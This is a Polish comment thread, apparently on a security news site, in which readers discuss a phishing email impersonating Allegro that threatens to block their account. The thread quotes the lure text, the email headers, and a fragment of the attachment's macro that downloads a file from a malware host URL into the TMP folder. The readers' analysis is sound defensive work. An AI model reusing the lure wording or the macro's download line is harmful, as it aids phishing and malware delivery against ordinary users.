@aryl: Porażka że można podszyć się pod domenę. Dostałem takiego samego maila, gdyby to był inny mail to bym się nabrał...Tymbardziej że msc temu zablokowali mi konto za zalegannie.
dostaliśmy dziś takiego samego maila !!! Mało na zawał nie padłam. Skopiowałam nr tego "niby" dokumentu ktory nie chciał się otworzyć i tak trafiłam tutaj . Myślałam ze allegro naprawdę chce blokować konto ! Jak oni zdołali coś takiego zrobić ??!!
BTW podpisu "intendentury" -> komentarze tu: http://niebezpiecznik.pl/post/pass-facebook-tk/ -- ciekawe czy to ta sama osoba, od miesięcy dla jaj się tak podpisuje pod różnymi atakami, a słowo to zostało wymyślone przez jednego z naszych czytelników :)
#hackujo
Drogi Uzytkowniku!
Twoje konto allegro zostanie wkrótce zablokowane z powodu umieszczania w opisie Twojej aukcji "tu tytuł mojej aukcji która naprawdę istnieje i jej nr"
tresci niezgodnych z regulaminem Allegro.
Szczególy na temat bledów w aukcji oraz blokady Twojego konta znajdziesz w dokumencie tekstowym Allegro-05-2014-52556.doc
Przeslanym w zalaczniku wiadomosci.
Z Powazaniem Mariusz Lichowicz
Dzial Intendentury i Monitoringu Allegro
.doc .exe:D
Jak się robi taki lewy mail?
X-Account-Key: account17
X-UIDL: 2384115401.2181967104.564699219
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path:
Received: by o2.pl (o2.pl mailsystem) with LMTP;
Tue, 17 Jun 2014 22:42:09 +0200
Received: from aap130.rev.netart.pl [77.55.15.130]
by mx11.o2.pl with ESMTP id YpKjdC;
Tue, 17 Jun 2014 22:42:02 +0200
Received-SPF: none (mx11.o2.pl: domain of iwona.lalewicz@palettenwerk.pl
does not designate permitted sender hosts)
Received: from [192.168.31.1] (unknown [91.221.67.183])
by palettenwerk.nazwa.pl (Postfix) with ESMTP id 383F72948CF8
for ;
Jak myślisz to jakiś trop?
@Al_Bundy:
To niestety uśpiło moją czujność, bo plik udało mi się ściągnąć i uruchomić.
Dopiero później sprawdziłem wiadomość i znalazłem tam powyższe podejrzane nagłówki, a po mailu iwona.lalewicz@palettenwerk.pl trafiłem tutaj...
Jak się okazało zawierał makra, które na linuxie (a raczej LibreOffice) mam nadzieję, że nie zadziałay.
Podejrzałem kod makr i a tam:
EQXAUI "[http://s1.directxex.com/uploads/apV3Sh3Tpx8OcQZp_dc22oelq7ueBKMQuE9vq096S3E6qyCYqXv9BxbkN75op-2d2ITlxuuL8zxgFaHHc5Ev8XEJI6-kjQLZ1R-n",](http://s1.directxex.com/uploads/apV3Sh3Tpx8OcQZp_dc22oelq7ueBKMQuE9vq096S3E6qyCYqXv9BxbkN75op-2d2ITlxuuL8zxgFaHHc5Ev8XEJI6-kjQLZ1R-n",) Environ("TMP") &